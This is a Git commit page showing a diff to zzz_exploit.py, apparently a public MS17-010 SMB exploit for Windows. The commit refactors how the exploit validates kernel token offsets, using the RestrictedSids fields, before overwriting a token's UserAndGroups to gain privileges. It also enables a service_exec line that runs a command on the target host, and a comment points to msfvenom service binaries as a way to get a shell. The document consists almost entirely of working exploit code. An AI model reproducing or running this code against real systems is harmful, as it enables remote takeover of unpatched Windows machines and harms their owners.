bozhihouc/MS17-010
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

test restricted SID values instead of group count

Browse Source
This commit is contained in:
zerosum0x0
2018-01-29 22:34:40 -07:00
parent 67b258e3b4
commit 8bd6f3760f
1 changed files with 53 additions and 16 deletions
Download Patch File Download Diff File Expand all files Collapse all files

69
zzz_exploit.py
View File

@@ -867,21 +867,8 @@ def exploit(target, pipe_name):
# copy Token data for restoration # copy Token data for restoration
tokenData = read_data(conn, info, tokenAddr, 0x40*info['PTR_SIZE']) tokenData = read_data(conn, info, tokenAddr, 0x40*info['PTR_SIZE'])
# parse necessary data out of token
userAndGroupCountOffset = info['TOKEN_USER_GROUP_CNT_OFFSET'] userAndGroupsAddr, userAndGroupCount, userAndGroupsAddrOffset, userAndGroupCountOffset = get_group_data_from_token(info, tokenData)
userAndGroupCount = unpack_from('<I', tokenData, userAndGroupCountOffset)[0]
userAndGroupsAddr = unpack_from('<'+fmt, tokenData, info['TOKEN_USER_GROUP_ADDR_OFFSET'])[0]
# hack to fix XP SP0 and SP1
if info['os'] == 'WINXP' and info['arch'] == 'x86':
if userAndGroupCount > 4 or userAndGroupCount == 0: # check NULL too
print("Bad TOKEN offsets detected, performing workaround")
userAndGroupCountOffset = info['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1']
userAndGroupCount = unpack_from('<I', tokenData, userAndGroupCountOffset)[0]
userAndGroupsAddr = unpack_from('<'+fmt, tokenData, info['TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1'])[0]
print('userAndGroupCount: 0x{:x}'.format(userAndGroupCount))
print('userAndGroupsAddr: 0x{:x}'.format(userAndGroupsAddr))
print('overwriting token UserAndGroups') print('overwriting token UserAndGroups')
# modify UserAndGroups info # modify UserAndGroups info
@@ -920,6 +907,55 @@ def exploit(target, pipe_name):
conn.get_socket().close() conn.get_socket().close()
return True return True
def validate_token_offset(info, tokenData, userAndGroupCountOffset, userAndGroupsAddrOffset):
RestrictedSidCount = unpack_from('<I', tokenData, userAndGroupCountOffset + 4)[0] # + sizeof(ULONG) (always 4)
RestrictedSids = unpack_from('<'+info['PTR_FMT'], tokenData, userAndGroupsAddrOffset + info['PTR_SIZE'])[0] # + sizeof(void*) (4 or 8)
userAndGroupCount = unpack_from('<I', tokenData, userAndGroupCountOffset)[0]
userAndGroupsAddr = unpack_from('<'+info['PTR_FMT'], tokenData, userAndGroupsAddrOffset)[0]
success = True
# RestrictedSids and RestrictedSidCount MUST be 0
# Could also add a failure point here if userAndGroupCount >= x
if RestrictedSids != 0 or RestrictedSidCount != 0:
print('Bad TOKEN_USER_GROUP offsets detected while parsing tokenData!')
print('RestrictedSids: 0x{:x}'.format(RestrictedSids))
print('RestrictedSidCount: 0x{:x}'.format(RestrictedSidCount))
success = False
print('userAndGroupCount: 0x{:x}'.format(userAndGroupCount))
print('userAndGroupsAddr: 0x{:x}'.format(userAndGroupsAddr))
return success, userAndGroupCount, userAndGroupsAddr
def get_group_data_from_token(info, tokenData):
userAndGroupCountOffset = info['TOKEN_USER_GROUP_CNT_OFFSET']
userAndGroupsAddrOffset = info['TOKEN_USER_GROUP_ADDR_OFFSET']
# try with default offsets
success, userAndGroupCount, userAndGroupsAddr = validate_token_offset(info, tokenData, userAndGroupCountOffset, userAndGroupsAddrOffset)
# hack to fix XP SP0 and SP1
# I will avoid over-engineering a more elegant solution and leave this as a hack,
# since XP SP0 and SP1 is the only edge case in a LOT of testing!
if not success and info['os'] == 'WINXP' and info['arch'] == 'x86':
print('Attempting WINXP SP0/SP1 x86 TOKEN_USER_GROUP workaround')
userAndGroupCountOffset = info['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1']
userAndGroupsAddrOffset = info['TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1']
# try with hack offsets
success, userAndGroupCount, userAndGroupsAddr = validate_token_offset(info, tokenData, userAndGroupCountOffset, userAndGroupsAddrOffset)
# still no good. Abort because something is wrong
if not success:
print('Bad TOKEN_USER_GROUP offsets. Abort > BSOD')
sys.exit()
# token parsed and validated
return userAndGroupsAddr, userAndGroupCount, userAndGroupsAddrOffset, userAndGroupCountOffset
def smb_pwn(conn, arch): def smb_pwn(conn, arch):
smbConn = conn.get_smbconnection() smbConn = conn.get_smbconnection()
@@ -931,7 +967,7 @@ def smb_pwn(conn, arch):
smbConn.disconnectTree(tid2) smbConn.disconnectTree(tid2)
#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py') #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
#service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt') service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
# Note: there are many methods to get shell over SMB admin session # Note: there are many methods to get shell over SMB admin session
# a simple method to get shell (but easily to be detected by AV) is # a simple method to get shell (but easily to be detected by AV) is
# executing binary generated by "msfvenom -f exe-service ..." # executing binary generated by "msfvenom -f exe-service ..."
@@ -1008,3 +1044,4 @@ pipe_name = None if len(sys.argv) < 3 else sys.argv[2]
exploit(target, pipe_name) exploit(target, pipe_name)
print('Done') print('Done')